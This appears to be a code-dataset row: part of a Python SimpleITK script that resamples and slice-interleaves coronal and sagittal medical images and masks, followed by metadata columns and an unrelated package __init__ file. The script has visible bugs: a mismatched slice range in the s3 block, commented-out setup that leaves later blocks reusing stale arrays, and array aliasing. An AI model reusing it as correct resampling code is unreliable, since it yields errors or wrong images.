moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_a3.nii.gz")
################################################################################################################################################
## ---------------------------------------------------- coronal Image ----------------------------------------------------------------------- ##
################################################################################################################################################
newSpacing = (1.5,3,1.5)
shiftOrigin = (0,0,0)
moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_co_sitk, shiftOrigin=shiftOrigin,
newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_co_mask, shiftOrigin=shiftOrigin,
newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
end = moving_image0.shape[0]
sitk.WriteImage(moving_image_sitk0,'moving_img_c1.nii.gz')
# sample slices -------------------------------------------------------------------------
# coronal-1 (c1) [0,1,2]
moving_mask = moving_mask0
moving_mask[range(0,end,3)] = moving_mask0[range(0,end,3)]
moving_mask[range(1,end,3)] = moving_mask1[range(1,end,3)]
moving_mask[range(2,end,3)] = moving_mask2[range(2,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_c1.nii.gz")
moving_image = moving_image0
moving_image[range(0,end,3)] = moving_image0[range(0,end,3)]
moving_image[range(1,end,3)] = moving_image1[range(1,end,3)]
moving_image[range(2,end,3)] = moving_image2[range(2,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_c1.nii.gz")
# # coronal-2 (c2) [2,0,1]
# shiftOrigin = (0,0,0)
# moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_co_sitk, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_co_mask, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# end = moving_image0.shape[1]
moving_mask = moving_mask0
moving_mask[range(2,end,3)] = moving_mask0[range(2,end,3)]
moving_mask[range(0,end,3)] = moving_mask1[range(0,end,3)]
moving_mask[range(1,end,3)] = moving_mask2[range(1,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_c2.nii.gz")
moving_image = moving_image0
moving_image[range(2,end,3)] = moving_image0[range(2,end,3)]
moving_image[range(0,end,3)] = moving_image1[range(0,end,3)]
moving_image[range(1,end,3)] = moving_image2[range(1,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_c2.nii.gz")
# # coronal-3 (c3) [1,2,0]
# shiftOrigin = (0,0,0)
# moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_co_sitk, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_co_mask, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# end = moving_image0.shape[1]
moving_mask = moving_mask0
moving_mask[range(1,end,3)] = moving_mask0[range(1,end,3)]
moving_mask[range(2,end,3)] = moving_mask1[range(2,end,3)]
moving_mask[range(0,end,3)] = moving_mask2[range(0,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_c3.nii.gz")
moving_image = moving_image0
moving_image[range(1,end,3)] = moving_image0[range(1,end,3)]
moving_image[range(2,end,3)] = moving_image1[range(2,end,3)]
moving_image[range(0,end,3)] = moving_image2[range(0,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_c3.nii.gz")
################################################################################################################################################
## ---------------------------------------------------- saggital Image ---------------------------------------------------------------------- ##
################################################################################################################################################
newSpacing = (3,1.5,1.5)
shiftOrigin = (0,0,0)
moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_sa_sitk, shiftOrigin=shiftOrigin,
newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_sa_mask, shiftOrigin=shiftOrigin,
newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
end = moving_image0.shape[0]
sitk.WriteImage(moving_image_sitk0,'moving_img_s1.nii.gz')
# sample slices -------------------------------------------------------------------------
# saggital-1 (s1) [0,1,2]
moving_mask = moving_mask0
moving_mask[range(0,end,3)] = moving_mask0[range(0,end,3)]
moving_mask[range(1,end,3)] = moving_mask1[range(1,end,3)]
moving_mask[range(2,end,3)] = moving_mask2[range(2,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_s1.nii.gz")
moving_image = moving_image0
moving_image[range(0,end,3)] = moving_image0[range(0,end,3)]
moving_image[range(1,end,3)] = moving_image1[range(1,end,3)]
moving_image[range(2,end,3)] = moving_image2[range(2,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_s1.nii.gz")
# # saggital-2 (s2) [2,0,1]
# shiftOrigin = (0,0,0)
# moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_sa_sitk, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_sa_mask, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# end = moving_image0.shape[2]
moving_mask = moving_mask0
moving_mask[range(2,end,3)] = moving_mask0[range(2,end,3)]
moving_mask[range(0,end,3)] = moving_mask1[range(0,end,3)]
moving_mask[range(1,end,3)] = moving_mask2[range(1,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_s2.nii.gz")
moving_image = moving_image0
moving_image[range(2,end,3)] = moving_image0[range(2,end,3)]
moving_image[range(0,end,3)] = moving_image1[range(0,end,3)]
moving_image[range(1,end,3)] = moving_image2[range(1,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_s2.nii.gz")
# # saggital-3 (s3) [1,2,0]
# shiftOrigin = (0,0,0)
# moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_sa_sitk, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_sa_mask, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# end = moving_image0.shape[2]
moving_mask = moving_mask0
moving_mask[range(1,end,3)] = moving_mask0[range(1,end,3)]
moving_mask[range(2,end,3)] = moving_mask1[range(2,end,3)]
moving_mask[range(0,end,3)] = moving_mask2[range(0,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_s3.nii.gz")
moving_image = moving_image0
moving_image[range(1,end,3)] = moving_image0[range(1,end,3)]
moving_image[range(2,end,3)] = moving_image1[range(3,end,3)]
moving_image[range(0,end,3)] = moving_image2[range(0,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_s3.nii.gz")
if __name__ == '__main__':
main() | 52.224872 | 168 | 0.696764 | 4,103 | 30,656 | 4.869608 | 0.056057 | 0.089189 | 0.054054 | 0.046046 | 0.815716 | 0.794044 | 0.781682 | 0.771471 | 0.762663 | 0.749249 | 0 | 0.040719 | 0.158044 | 30,656 | 587 | 169 | 52.224872 | 0.733369 | 0.22087 | 0 | 0.53869 | 0 | 0.002976 | 0.03662 | 0.025539 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.011905 | null | null | 0.008929 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b5d9bdb94e5bd315dc9f26bb424a075e82b75a12 | 98 | py | Python | qroute/models/__init__.py | AnimeshSinha1309/qroute-router | 56ef1b6c08e721011e1f73a04b0b0229f7bdff1b | [
"MIT"
] | null | null | null | qroute/models/__init__.py | AnimeshSinha1309/qroute-router | 56ef1b6c08e721011e1f73a04b0b0229f7bdff1b | [
"MIT"
] | 10 | 2020-10-29T06:33:35.000Z | 2021-01-12T18:40:45.000Z | qroute/models/__init__.py | AnimeshSinha1309/quantum-rl | 56ef1b6c08e721011e1f73a04b0b0229f7bdff1b | [
"MIT"
] | null | null | null | import qroute.models.actor_critic
import qroute.models.double_dqn
import qroute.models.graph_dual
| 24.5 | 33 | 0.877551 | 15 | 98 | 5.533333 | 0.6 | 0.433735 | 0.650602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061224 | 98 | 3 | 34 | 32.666667 | 0.902174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.